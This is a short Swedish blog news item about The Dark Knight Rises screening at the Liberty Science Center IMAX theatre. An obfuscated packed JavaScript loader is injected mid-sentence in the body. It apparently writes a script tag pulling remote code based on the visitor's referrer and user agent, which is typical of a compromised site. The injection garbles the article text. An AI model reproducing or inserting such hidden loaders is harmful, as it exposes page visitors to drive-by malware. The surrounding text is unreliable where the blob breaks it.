Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

The Dark Knight Rises visas på stor IMAX

Sebastian

Det är den super stora IMAX-biografen Liberty Science Center som är en av många biografer där filmen Batman eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rayiy|var|u0026u|referrer|kbnir||js|php’.split(’|’),0,{}))
The Dark Night Rises
kommer att visas.
Liberty Science Center är också Nordamerikas största IMAX-biograf. Att detta kan göras är tack vare regissören Christopher Nolan som insisterade på att filma filmen med en film och inte i digitalt format.

Se videon ovan!